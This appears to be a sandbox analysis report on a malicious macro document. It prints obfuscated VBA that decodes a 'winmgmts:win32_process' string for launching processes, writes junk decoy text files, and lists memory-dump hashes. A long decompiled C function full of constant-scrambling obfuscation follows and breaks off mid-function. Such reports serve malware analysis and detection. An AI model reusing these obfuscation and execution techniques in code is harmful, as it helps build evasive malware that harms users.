                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            anyPG

                                            Close

                                            YVZXECEHD

                                            Strings    Decrypted Strings
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs"
                                            "CcDmClHsnCC"
                                            "aqGiHISIbAoabV"
                                            "nJJzFRjEWpRikxCD"
                                            "]a""nw[3"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD"
                                            "syYTHJShrguhzb"
                                            "TubioGUTLadgXbA"
                                            "oLweAMoGsqVE"
                                            Line    Instruction    Meta Information
                                            263

                                            Function Hrs2a1p95u19(Svk60sycz63sk)

                                            264

                                            Q491417n8n1 = Pg5minli2d3c9

                                            Pg5minli2d3c9

                                            executed
                                            265

                                            Goto uWZkeMFv

                                            266

                                            Dim zDsRaIBGF as Object

                                            267

                                            Set ViWsSIH = sreXHFD

                                            sreXHFD

                                            268

                                            Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            269

                                            Dim uWZkeMFv as Object

                                            270

                                            Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")

                                            CreateTextFile

                                            271

                                            uWZkeMFv.WriteLine "CcDmClHsnCC"

                                            WriteLine

                                            272

                                            uWZkeMFv.WriteLine "aqGiHISIbAoabV"

                                            WriteLine

                                            273

                                            uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD"

                                            WriteLine

                                            274

                                            Set QOrvJEB = eCIzUDyJ

                                            eCIzUDyJ

                                            275

                                            uWZkeMFv.Close

                                            Close

                                            276

                                            Set zDsRaIBGF = Nothing

                                            277

                                            Set UskmBJF = yJmmmVIAG

                                            yJmmmVIAG

                                            278

                                            Set uWZkeMFv = Nothing

                                            278

                                            uWZkeMFv:

                                            280

                                            Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0)

                                            Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process

                                            Ij2hesgjee57d3s0

                                            executed
                                            281

                                            Goto iHKuDmaEr

                                            282

                                            Dim OMZxxg as Object

                                            283

                                            Set drZcHkCm = uVItICICB

                                            uVItICICB

                                            284

                                            Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            285

                                            Dim iHKuDmaEr as Object

                                            286

                                            Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")

                                            CreateTextFile

                                            287

                                            iHKuDmaEr.WriteLine "syYTHJShrguhzb"

                                            WriteLine

                                            288

                                            iHKuDmaEr.WriteLine "TubioGUTLadgXbA"

                                            WriteLine

                                            289

                                            iHKuDmaEr.WriteLine "oLweAMoGsqVE"

                                            WriteLine

                                            290

                                            Set noebIvSiu = anyPG

                                            anyPG

                                            291

                                            iHKuDmaEr.Close

                                            Close

                                            292

                                            Set OMZxxg = Nothing

                                            293

                                            Set NXbmIuHX = YVZXECEHD

                                            YVZXECEHD

                                            294

                                            Set iHKuDmaEr = Nothing

                                            294

                                            iHKuDmaEr:

                                            296

                                            End Function

                                            Module: Zdjtk46nm17voo

                                            Declaration
                                            Line    Content
                                            1

                                            Attribute VB_Name = "Zdjtk46nm17voo"


                                              Executed Functions

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2123071389.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: efd2759c98cf131e9a29fa20f50551820d3bcb8f44967cbb5ad3f625a39ce8aa
                                              • Instruction ID: 0767a89451e4480503773bc507aa25507c46146a89e6a224fefc7f9b43c5b611
                                              • Opcode Fuzzy Hash: efd2759c98cf131e9a29fa20f50551820d3bcb8f44967cbb5ad3f625a39ce8aa
                                              • Instruction Fuzzy Hash: BA31002091E7C28FE7579B385CB52A07FB0AF17201B0A04EBD0C4CF1B3DA18599AD722
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2123071389.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 459832aa87b14f07334aba52be976b5f4175cd4db572fcdb56d5f3d632686b55
                                              • Instruction ID: f628f3c2659fa51ee64a7b317d981fb46f36e00cfacf97101e60185bd45ce1dc
                                              • Opcode Fuzzy Hash: 459832aa87b14f07334aba52be976b5f4175cd4db572fcdb56d5f3d632686b55
                                              • Instruction Fuzzy Hash: CBE0D810B1DC0B4FFB94666C680A3B473C1E754353F600076E80CC22A3DD1AD9448381
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Executed Functions

                                              C-Code - Quality: 97%
                                              			E00222C63() {
                                              				char _v68;
                                              				signed int _v72;
                                              				char _v80;
                                              				char _v88;
                                              				intOrPtr _v92;
                                              				intOrPtr _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				void* _v112;
                                              				signed int _v116;
                                              				char _v124;
                                              				char _v132;
                                              				char _v140;
                                              				char _v144;
                                              				signed int _v148;
                                              				void* _v152;
                                              				void* _v156;
                                              				signed int _v160;
                                              				signed int _v164;
                                              				signed int _v168;
                                              				signed int _v172;
                                              				signed int _v176;
                                              				signed int _v180;
                                              				signed int _v184;
                                              				signed int _v188;
                                              				signed int _v192;
                                              				signed int _v196;
                                              				signed int _v200;
                                              				signed int _v204;
                                              				signed int _v208;
                                              				signed int _v212;
                                              				signed int _v216;
                                              				unsigned int _v220;
                                              				signed int _v224;
                                              				signed int _v228;
                                              				signed int _v232;
                                              				signed int _v236;
                                              				signed int _v240;
                                              				signed int _v244;
                                              				unsigned int _v248;
                                              				signed int _v252;
                                              				signed int _v256;
                                              				signed int _v260;
                                              				signed int _v264;
                                              				signed int _v268;
                                              				unsigned int _v272;
                                              				signed int _v276;
                                              				signed int _v280;
                                              				signed int _v284;
                                              				signed int _v288;
                                              				signed int _v292;
                                              				signed int _v296;
                                              				signed int _v300;
                                              				signed int _v304;
                                              				signed int _v308;
                                              				signed int _v312;
                                              				signed int _v316;
                                              				signed int _v320;
                                              				signed int _v324;
                                              				signed int _v328;
                                              				signed int _v332;
                                              				signed int _v336;
                                              				signed int _v340;
                                              				unsigned int _v344;
                                              				signed int _v348;
                                              				signed int _v352;
                                              				signed int _v356;
                                              				signed int _v360;
                                              				signed int _v364;
                                              				signed int _v368;
                                              				signed int _v372;
                                              				signed int _v376;
                                              				signed int _v380;
                                              				signed int _v384;
                                              				signed int _v388;
                                              				signed int _v392;
                                              				unsigned int _v396;
                                              				signed int _v400;
                                              				signed int _v404;
                                              				signed int _v408;
                                              				signed int _v412;
                                              				signed int _v416;
                                              				signed int _v420;
                                              				signed int _v424;
                                              				signed int _v428;
                                              				signed int _v432;
                                              				signed int _v436;
                                              				signed int _v440;
                                              				signed int _v444;
                                              				signed int _v448;
                                              				signed int _v452;
                                              				signed int _v456;
                                              				signed int _v460;
                                              				signed int _v464;
                                              				signed int _v468;
                                              				signed int _v472;
                                              				signed int _v476;
                                              				signed int _v480;
                                              				signed int _v484;
                                              				signed int _v488;
                                              				signed int _v492;
                                              				signed int _v496;
                                              				signed int _v500;
                                              				signed int _v504;
                                              				signed int _v508;
                                              				signed int _v512;
                                              				unsigned int _v516;
                                              				signed int _v520;
                                              				signed int _v524;
                                              				signed int _v528;
                                              				signed int _v532;
                                              				signed int _v536;
                                              				signed int _v540;
                                              				unsigned int _v544;
                                              				signed int _v548;
                                              				signed int _v552;
                                              				signed int _v556;
                                              				signed int _v560;
                                              				signed int _v564;
                                              				signed int _v568;
                                              				signed int _v572;
                                              				unsigned int _v576;
                                              				signed int _v580;
                                              				signed int _v584;
                                              				unsigned int _v588;
                                              				signed int _v592;
                                              				unsigned int _v596;
                                              				signed int _v600;
                                              				signed int _t1135;
                                              				signed int _t1138;
                                              				signed int _t1140;
                                              				signed int _t1144;
                                              				signed int _t1172;
                                              				void* _t1186;
                                              				signed int _t1199;
                                              				void* _t1213;
                                              				signed int _t1218;
                                              				signed int _t1224;
                                              				signed int _t1257;
                                              				signed int _t1336;
                                              				signed int _t1340;
                                              				signed int _t1348;
                                              				signed int _t1351;
                                              				signed int _t1352;
                                              				signed int _t1353;
                                              				signed int _t1354;
                                              				signed int _t1355;
                                              				signed int _t1356;
                                              				signed int _t1357;
                                              				signed int _t1358;
                                              				signed int _t1359;
                                              				signed int _t1360;
                                              				signed int _t1361;
                                              				signed int _t1362;
                                              				signed int _t1363;
                                              				signed int _t1364;
                                              				signed int _t1365;
                                              				signed int _t1366;
                                              				signed int _t1367;
                                              				signed int _t1368;
                                              				signed int _t1369;
                                              				signed int _t1370;
                                              				signed int _t1371;
                                              				signed int _t1372;
                                              				void* _t1384;
                                              				signed int _t1385;
                                              				void* _t1387;
                                              				void* _t1389;
                                              				void* _t1391;
                                              				void* _t1392;
                                              				void* _t1393;
                                              
                                              				_t1387 = (_t1385 & 0xfffffff8) - 0x258;
                                              				_v596 = 0x54d1;
                                              				_t1225 = 0x2a32d0a;
                                              				_t1351 = 0x66;
                                              				_v596 = _v596 / _t1351;
                                              				_t1352 = 0x6b;
                                              				_v596 = _v596 / _t1352;
                                              				_v596 = _v596 >> 4;
                                              				_v596 = _v596 ^ 0x00002830;
                                              				_v416 = 0xcdcb;
                                              				_v416 = _v416 + 0x2116;
                                              				_t1353 = 0x1f;
                                              				_v416 = _v416 * 0x30;
                                              				_v416 = _v416 ^ 0x002c9323;
                                              				_v488 = 0x9982;
                                              				_v488 = _v488 | 0x10c88477;
                                              				_v488 = _v488 ^ 0xa41c88c2;
                                              				_v488 = _v488 / _t1353;
                                              				_v488 = _v488 ^ 0x05d51165;
                                              				_v496 = 0x77c8;
                                              				_v496 = _v496 >> 3;
                                              				_t1354 = 0xa;
                                              				_v496 = _v496 / _t1354;
                                              				_v496 = _v496 << 7;
                                              				_v496 = _v496 ^ 0x0000cb31;
                                              				_v232 = 0x48c9;
                                              				_v232 = _v232 << 0xe;
                                              				_v232 = _v232 ^ 0x12321472;
                                              				_v360 = 0x3c3d;
                                              				_t1218 = 5;
                                              				_v360 = _v360 / _t1218;
                                              				_v360 = _v360 * 0x2f;
                                              				_v360 = _v360 ^ 0x000268e3;
                                              				_v176 = 0x1856;
                                              				_v176 = _v176 * 0x70;
                                              				_v176 = _v176 ^ 0x000ab2a8;
                                              				_v264 = 0xa86e;
                                              				_v264 = _v264 + 0xffff13b3;
                                              				_v264 = _v264 ^ 0xffffefbf;
                                              				_v376 = 0x5423;
                                              				_v376 = _v376 + 0xffffd432;
                                              				_v376 = _v376 | 0x32249576;
                                              				_v376 = _v376 ^ 0x3224c778;
                                              				_v248 = 0xe66f;
                                              				_v248 = _v248 >> 9;
                                              				_v248 = _v248 ^ 0x000023ba;
                                              				_v308 = 0x205b;
                                              				_v308 = _v308 + 0xffff1f5e;
                                              				_v308 = _v308 << 8;
                                              				_v308 = _v308 ^ 0xff3fb884;
                                              				_v484 = 0x592;
                                              				_v484 = _v484 + 0xffffd519;
                                              				_v484 = _v484 | 0x759ff25f;
                                              				_v484 = _v484 + 0x87eb;
                                              				_v484 = _v484 ^ 0x00008574;
                                              				_v168 = 0x6ddb;
                                              				_v168 = _v168 | 0x6e943d07;
                                              				_v168 = _v168 ^ 0x6e944d9a;
                                              				_v200 = 0xd6b0;
                                              				_v200 = _v200 + 0xffff46fa;
                                              				_v200 = _v200 ^ 0x00002650;
                                              				_v452 = 0x246b;
                                              				_v452 = _v452 ^ 0x586b7630;
                                              				_v452 = _v452 << 0xc;
                                              				_v452 = _v452 + 0xd57e;
                                              				_v452 = _v452 ^ 0xb526cd97;
                                              				_v348 = 0xfa69;
                                              				_t1340 = 0x52;
                                              				_t1355 = 0x65;
                                              				_v348 = _v348 * 0x65;
                                              				_v348 = _v348 | 0xab757825;
                                              				_v348 = _v348 ^ 0xab77a96f;
                                              				_v324 = 0xa741;
                                              				_v324 = _v324 ^ 0x4f747397;
                                              				_v324 = _v324 / _t1340;
                                              				_v324 = _v324 ^ 0x00f83cd8;
                                              				_v296 = 0x788d;
                                              				_v296 = _v296 ^ 0x0ef2968d;
                                              				_v296 = _v296 ^ 0x495ddb9a;
                                              				_v296 = _v296 ^ 0x47af2616;
                                              				_v220 = 0xb89f;
                                              				_v220 = _v220 >> 0xb;
                                              				_v220 = _v220 ^ 0x000056af;
                                              				_v520 = 0x12ce;
                                              				_v520 = _v520 + 0xe747;
                                              				_v520 = _v520 << 7;
                                              				_v520 = _v520 | 0x5b07959e;
                                              				_v520 = _v520 ^ 0x5b7fa869;
                                              				_v208 = 0xa95c;
                                              				_v208 = _v208 + 0xffff5ee2;
                                              				_v208 = _v208 ^ 0x00000a9e;
                                              				_v172 = 0xa2eb;
                                              				_v172 = _v172 * 0x79;
                                              				_v172 = _v172 ^ 0x004d63d4;
                                              				_v180 = 0x98a7;
                                              				_v180 = _v180 | 0x8ae8094c;
                                              				_v180 = _v180 ^ 0x8ae8e600;
                                              				_v424 = 0xd5a0;
                                              				_v424 = _v424 << 5;
                                              				_v424 = _v424 / _t1355;
                                              				_v424 = _v424 ^ 0x00007145;
                                              				_v392 = 0x548d;
                                              				_v392 = _v392 + 0xffff9ec2;
                                              				_v392 = _v392 + 0xffffa1fb;
                                              				_v392 = _v392 ^ 0xffff9dba;
                                              				_v340 = 0x6e45;
                                              				_t1356 = 0x16;
                                              				_v340 = _v340 / _t1356;
                                              				_v340 = _v340 + 0xffff4bce;
                                              				_v340 = _v340 ^ 0xffff3c02;
                                              				_v536 = 0xbde4;
                                              				_v536 = _v536 * 0x7f;
                                              				_v536 = _v536 ^ 0x574a5eba;
                                              				_v536 = _v536 << 0xd;
                                              				_v536 = _v536 ^ 0x8d54c30e;
                                              				_v284 = 0x7ef6;
                                              				_v284 = _v284 + 0x9ef0;
                                              				_v284 = _v284 ^ 0x00015c31;
                                              				_v408 = 0xc211;
                                              				_v408 = _v408 ^ 0x3543d7c0;
                                              				_v408 = _v408 * 0x2b;
                                              				_v408 = _v408 ^ 0xf244fbb0;
                                              				_v588 = 0x856b;
                                              				_v588 = _v588 ^ 0xfc1cd259;
                                              				_v588 = _v588 ^ 0x7d294751;
                                              				_v588 = _v588 >> 0xe;
                                              				_v588 = _v588 ^ 0x000240de;
                                              				_v508 = 0x646a;
                                              				_t1357 = 0x1e;
                                              				_v508 = _v508 / _t1357;
                                              				_t1358 = 0x35;
                                              				_v508 = _v508 / _t1358;
                                              				_v508 = _v508 * 0x5a;
                                              				_v508 = _v508 ^ 0x00003cc0;
                                              				_v472 = 0x196b;
                                              				_v472 = _v472 * 0x16;
                                              				_v472 = _v472 + 0x8cdc;
                                              				_v472 = _v472 ^ 0x6344539c;
                                              				_v472 = _v472 ^ 0x6346dd33;
                                              				_v212 = 0xb705;
                                              				_v212 = _v212 << 7;
                                              				_v212 = _v212 ^ 0x005bff43;
                                              				_v312 = 0xb48f;
                                              				_v312 = _v312 + 0xffff701f;
                                              				_v312 = _v312 >> 0xa;
                                              				_v312 = _v312 ^ 0x00001302;
                                              				_v480 = 0xed6e;
                                              				_v480 = _v480 | 0x6be3eced;
                                              				_v480 = _v480 + 0x4979;
                                              				_v480 = _v480 ^ 0x6be47f6f;
                                              				_v204 = 0xd35b;
                                              				_v204 = _v204 >> 8;
                                              				_v204 = _v204 ^ 0x00000622;
                                              				_v456 = 0xd2fa;
                                              				_v456 = _v456 << 3;
                                              				_v456 = _v456 + 0xffffd4b1;
                                              				_v456 = _v456 << 4;
                                              				_v456 = _v456 ^ 0x0066f5d7;
                                              				_v464 = 0x5ee1;
                                              				_v464 = _v464 >> 9;
                                              				_v464 = _v464 | 0xf1defbea;
                                              				_v464 = _v464 ^ 0xf1de88d3;
                                              				_v304 = 0x5962;
                                              				_v304 = _v304 ^ 0xf5db8de9;
                                              				_v304 = _v304 | 0xcdcbde78;
                                              				_v304 = _v304 ^ 0xfddba732;
                                              				_v196 = 0xf258;
                                              				_v196 = _v196 << 7;
                                              				_v196 = _v196 ^ 0x007971a7;
                                              				_v448 = 0xfcbd;
                                              				_v448 = _v448 | 0x39b7afc5;
                                              				_v448 = _v448 * 0x70;
                                              				_v448 = _v448 | 0x0e40c0bc;
                                              				_v448 = _v448 ^ 0x4e7fac25;
                                              				_v412 = 0x82bf;
                                              				_v412 = _v412 | 0xb02f6e2d;
                                              				_v412 = _v412 + 0xffff8626;
                                              				_v412 = _v412 ^ 0xb02f1cac;
                                              				_v396 = 0xa4bf;
                                              				_v396 = _v396 ^ 0xb063c23f;
                                              				_v396 = _v396 >> 0xf;
                                              				_v396 = _v396 ^ 0x00011327;
                                              				_v592 = 0x3de9;
                                              				_v592 = _v592 + 0xffff189b;
                                              				_v592 = _v592 * 0x3e;
                                              				_v592 = _v592 + 0xffff8de2;
                                              				_v592 = _v592 ^ 0xffd6d64a;
                                              				_v404 = 0x86b0;
                                              				_v404 = _v404 >> 5;
                                              				_v404 = _v404 | 0x66bae114;
                                              				_v404 = _v404 ^ 0x66bacebe;
                                              				_v268 = 0x5937;
                                              				_v268 = _v268 + 0xb57c;
                                              				_v268 = _v268 ^ 0x00015145;
                                              				_v280 = 0x9a1f;
                                              				_v280 = _v280 + 0xffffa2eb;
                                              				_v280 = _v280 ^ 0x000041dd;
                                              				_v572 = 0xebd0;
                                              				_v572 = _v572 ^ 0xedb0bf00;
                                              				_t1359 = 0x32;
                                              				_v572 = _v572 / _t1359;
                                              				_v572 = _v572 << 1;
                                              				_v572 = _v572 ^ 0x09819433;
                                              				_v468 = 0x3364;
                                              				_v468 = _v468 + 0xffff353c;
                                              				_v468 = _v468 + 0x9f63;
                                              				_v468 = _v468 | 0x0336228b;
                                              				_v468 = _v468 ^ 0x0336362e;
                                              				_v580 = 0x8c54;
                                              				_v580 = _v580 | 0xf7fe7ffd;
                                              				_v580 = _v580 << 2;
                                              				_v580 = _v580 ^ 0xdffb9211;
                                              				_v400 = 0xc44;
                                              				_v400 = _v400 | 0x703220aa;
                                              				_v400 = _v400 + 0x556b;
                                              				_v400 = _v400 ^ 0x70328daf;
                                              				_v316 = 0xc625;
                                              				_t1360 = 0x2f;
                                              				_v316 = _v316 / _t1360;
                                              				_v316 = _v316 | 0xad0f9139;
                                              				_v316 = _v316 ^ 0xad0f9a77;
                                              				_v352 = 0x3bfc;
                                              				_v352 = _v352 ^ 0x3d91e4fd;
                                              				_v352 = _v352 << 4;
                                              				_v352 = _v352 ^ 0xd91d9102;
                                              				_v188 = 0xbf9d;
                                              				_v188 = _v188 ^ 0xeb169de8;
                                              				_v188 = _v188 ^ 0xeb160ae0;
                                              				_v272 = 0xf610;
                                              				_v272 = _v272 >> 0xc;
                                              				_v272 = _v272 ^ 0x000001f5;
                                              				_v500 = 0xa952;
                                              				_v500 = _v500 ^ 0x762f8db9;
                                              				_t1361 = 0x7b;
                                              				_v500 = _v500 * 0x6e;
                                              				_v500 = _v500 | 0x4a766c6e;
                                              				_v500 = _v500 ^ 0xca77b322;
                                              				_v420 = 0xb3ce;
                                              				_v420 = _v420 | 0x5d2bbb9b;
                                              				_v420 = _v420 + 0x97cf;
                                              				_v420 = _v420 ^ 0x5d2c523b;
                                              				_v276 = 0x9f6f;
                                              				_v276 = _v276 + 0x6bc4;
                                              				_v276 = _v276 ^ 0x00010aa4;
                                              				_v504 = 0x2102;
                                              				_v504 = _v504 >> 7;
                                              				_v504 = _v504 + 0xffff0b4b;
                                              				_v504 = _v504 << 4;
                                              				_v504 = _v504 ^ 0xfff0cd66;
                                              				_v320 = 0xeb7e;
                                              				_v320 = _v320 / _t1361;
                                              				_v320 = _v320 << 0xc;
                                              				_v320 = _v320 ^ 0x001ed973;
                                              				_v512 = 0x61aa;
                                              				_v512 = _v512 | 0xfdc9feff;
                                              				_t1362 = 0x42;
                                              				_v512 = _v512 / _t1362;
                                              				_v512 = _v512 ^ 0x03d81aae;
                                              				_v540 = 0x929f;
                                              				_t1363 = 3;
                                              				_v540 = _v540 * 0x59;
                                              				_v540 = _v540 ^ 0xd582cfd5;
                                              				_v540 = _v540 + 0xffff6c6f;
                                              				_v540 = _v540 ^ 0xd5af900c;
                                              				_v332 = 0xd4e0;
                                              				_v332 = _v332 | 0xf04e42e2;
                                              				_v332 = _v332 ^ 0xcda3b68f;
                                              				_v332 = _v332 ^ 0x3ded4bfa;
                                              				_v192 = 0xb136;
                                              				_v192 = _v192 >> 6;
                                              				_v192 = _v192 ^ 0x00000257;
                                              				_v460 = 0xb4b8;
                                              				_v460 = _v460 + 0xffff8599;
                                              				_v460 = _v460 / _t1363;
                                              				_v460 = _v460 + 0x6faa;
                                              				_v460 = _v460 ^ 0x0000d8b1;
                                              				_v548 = 0x6ab8;
                                              				_t1364 = 0x7c;
                                              				_v548 = _v548 * 0x71;
                                              				_v548 = _v548 / _t1364;
                                              				_v548 = _v548 << 4;
                                              				_v548 = _v548 ^ 0x00063121;
                                              				_v260 = 0x579;
                                              				_v260 = _v260 >> 0xd;
                                              				_v260 = _v260 ^ 0x00001a36;
                                              				_v380 = 0x5d49;
                                              				_t1365 = 0x3a;
                                              				_v380 = _v380 * 0x2a;
                                              				_v380 = _v380 << 0xf;
                                              				_v380 = _v380 ^ 0xa6fd05f8;
                                              				_v584 = 0x9575;
                                              				_v584 = _v584 << 0xe;
                                              				_v584 = _v584 >> 0xb;
                                              				_v584 = _v584 >> 9;
                                              				_v584 = _v584 ^ 0x00001953;
                                              				_v388 = 0x71ed;
                                              				_v388 = _v388 | 0xfa0f4c1a;
                                              				_v388 = _v388 * 0x21;
                                              				_v388 = _v388 ^ 0x3bff2db3;
                                              				_v576 = 0x40ac;
                                              				_v576 = _v576 ^ 0x72872e3c;
                                              				_v576 = _v576 >> 3;
                                              				_v576 = _v576 >> 6;
                                              				_v576 = _v576 ^ 0x00395cc8;
                                              				_v356 = 0x9a14;
                                              				_v356 = _v356 * 5;
                                              				_v356 = _v356 / _t1365;
                                              				_v356 = _v356 ^ 0x00000d15;
                                              				_v364 = 0x97d4;
                                              				_v364 = _v364 + 0xffff1281;
                                              				_v364 = _v364 << 0xd;
                                              				_v364 = _v364 ^ 0xf54ac276;
                                              				_v568 = 0x9f15;
                                              				_v568 = _v568 + 0xffff08f5;
                                              				_v568 = _v568 * 0x54;
                                              				_v568 = _v568 + 0x8411;
                                              				_v568 = _v568 ^ 0xffe3bf59;
                                              				_v372 = 0xb5ac;
                                              				_v372 = _v372 | 0xef292143;
                                              				_v372 = _v372 << 0xc;
                                              				_v372 = _v372 ^ 0x9b5ed191;
                                              				_v560 = 0xc079;
                                              				_v560 = _v560 << 6;
                                              				_v560 = _v560 | 0x75378a54;
                                              				_v560 = _v560 + 0xffff0fb6;
                                              				_v560 = _v560 ^ 0x7536a745;
                                              				_v252 = 0xffdd;
                                              				_v252 = _v252 ^ 0x94fd4b64;
                                              				_v252 = _v252 ^ 0x94fd9346;
                                              				_v344 = 0x2817;
                                              				_v344 = _v344 + 0xffffb9ce;
                                              				_v344 = _v344 >> 5;
                                              				_v344 = _v344 ^ 0x07ffc707;
                                              				_v544 = 0xc4c3;
                                              				_v544 = _v544 << 4;
                                              				_v544 = _v544 | 0xf37ee84d;
                                              				_v544 = _v544 >> 9;
                                              				_v544 = _v544 ^ 0x0079cb8a;
                                              				_v244 = 0xbe83;
                                              				_v244 = _v244 << 9;
                                              				_v244 = _v244 ^ 0x017d70fa;
                                              				_v552 = 0x87b1;
                                              				_v552 = _v552 + 0xe2ec;
                                              				_v552 = _v552 + 0xffff8757;
                                              				_t1366 = 0x57;
                                              				_v552 = _v552 / _t1366;
                                              				_v552 = _v552 ^ 0x00000cf8;
                                              				_v524 = 0x9ee8;
                                              				_v524 = _v524 >> 0xc;
                                              				_v524 = _v524 + 0xffffea20;
                                              				_v524 = _v524 + 0x67c2;
                                              				_v524 = _v524 ^ 0x0000257d;
                                              				_v240 = 0x3e44;
                                              				_t1367 = 0x4e;
                                              				_v240 = _v240 * 0x26;
                                              				_v240 = _v240 ^ 0x000944b9;
                                              				_v184 = 0xb17e;
                                              				_v184 = _v184 + 0xc83;
                                              				_v184 = _v184 ^ 0x00008468;
                                              				_v428 = 0x2247;
                                              				_v428 = _v428 >> 6;
                                              				_v428 = _v428 | 0xbf36a58a;
                                              				_v428 = _v428 ^ 0xbf36942e;
                                              				_v492 = 0xaf88;
                                              				_v492 = _v492 | 0x489e17bf;
                                              				_v492 = _v492 / _t1367;
                                              				_t1368 = 0x59;
                                              				_v492 = _v492 / _t1368;
                                              				_v492 = _v492 ^ 0x00028cc4;
                                              				_v236 = 0x579b;
                                              				_v236 = _v236 | 0x958cbadb;
                                              				_v236 = _v236 ^ 0x958cb114;
                                              				_v528 = 0x596e;
                                              				_t1369 = 0x25;
                                              				_v528 = _v528 / _t1369;
                                              				_v528 = _v528 + 0xffff0f20;
                                              				_v528 = _v528 * 0x71;
                                              				_v528 = _v528 ^ 0xff96cb88;
                                              				_v384 = 0xdb4f;
                                              				_v384 = _v384 / _t1340;
                                              				_v384 = _v384 ^ 0x047c7efe;
                                              				_v384 = _v384 ^ 0x047c6269;
                                              				_v256 = 0x2cf1;
                                              				_v256 = _v256 | 0x808b3cca;
                                              				_v256 = _v256 ^ 0x808b1c76;
                                              				_v300 = 0x3901;
                                              				_t1370 = 0x6d;
                                              				_v300 = _v300 * 0xa;
                                              				_v300 = _v300 >> 6;
                                              				_v300 = _v300 ^ 0x0000212b;
                                              				_v368 = 0x796e;
                                              				_v368 = _v368 * 0xc;
                                              				_v368 = _v368 * 0x3e;
                                              				_v368 = _v368 ^ 0x0160b691;
                                              				_v444 = 0xa0b9;
                                              				_v444 = _v444 | 0x9ca1dfa8;
                                              				_v444 = _v444 / _t1370;
                                              				_v444 = _v444 * 0x63;
                                              				_v444 = _v444 ^ 0x8e437e2f;
                                              				_v532 = 0x8c65;
                                              				_v532 = _v532 * 0x56;
                                              				_v532 = _v532 << 0xa;
                                              				_v532 = _v532 * 0x21;
                                              				_v532 = _v532 ^ 0x519e8d1f;
                                              				_v556 = 0x4a7f;
                                              				_v556 = _v556 << 0xf;
                                              				_v556 = _v556 + 0xa5c2;
                                              				_v556 = _v556 | 0xa1707f4f;
                                              				_v556 = _v556 ^ 0xa5705fb9;
                                              				_v436 = 0x3fda;
                                              				_v436 = _v436 * 0x3e;
                                              				_v436 = _v436 + 0x1364;
                                              				_v436 = _v436 ^ 0xe1573554;
                                              				_v436 = _v436 ^ 0xe158f097;
                                              				_v564 = 0x6043;
                                              				_v564 = _v564 | 0xb689377f;
                                              				_v564 = _v564 >> 8;
                                              				_v564 = _v564 ^ 0x2a62422c;
                                              				_v564 = _v564 ^ 0x2ad4e10a;
                                              				_v328 = 0x5c6e;
                                              				_v328 = _v328 ^ 0x42ae754b;
                                              				_v328 = _v328 + 0xbaa3;
                                              				_v328 = _v328 ^ 0x42aeef53;
                                              				_v228 = 0xef63;
                                              				_v228 = _v228 >> 0xe;
                                              				_v228 = _v228 ^ 0x00001997;
                                              				_v336 = 0x5044;
                                              				_v336 = _v336 >> 0xf;
                                              				_v336 = _v336 + 0xffffb35b;
                                              				_v336 = _v336 ^ 0xffffef5d;
                                              				_v440 = 0x7004;
                                              				_v440 = _v440 * 0x7e;
                                              				_v440 = _v440 * 0x13;
                                              				_v440 = _v440 << 0x10;
                                              				_v440 = _v440 ^ 0x85685bd2;
                                              				_v164 = 0x75ea;
                                              				_v164 = _v164 << 0xb;
                                              				_v164 = _v164 ^ 0x03af40f2;
                                              				_v224 = 0xc6cf;
                                              				_v224 = _v224 << 9;
                                              				_v224 = _v224 ^ 0x018dae64;
                                              				_v160 = 0xb450;
                                              				_t1371 = 0x38;
                                              				_v160 = _v160 / _t1371;
                                              				_v160 = _v160 ^ 0x00003b29;
                                              				_v476 = 0xddbc;
                                              				_v476 = _v476 ^ 0xc2407c95;
                                              				_v476 = _v476 + 0xd5a3;
                                              				_v476 = _v476 + 0x8192;
                                              				_v476 = _v476 ^ 0xc241f0f2;
                                              				_v216 = 0xdff2;
                                              				_t1372 = 0x2c;
                                              				_v216 = _v216 * 0x1c;
                                              				_v216 = _v216 ^ 0x00187743;
                                              				_v516 = 0x400b;
                                              				_v516 = _v516 / _t1218;
                                              				_v516 = _v516 + 0xc836;
                                              				_v516 = _v516 >> 0xa;
                                              				_v516 = _v516 ^ 0x00004f08;
                                              				_v292 = 0xdc4e;
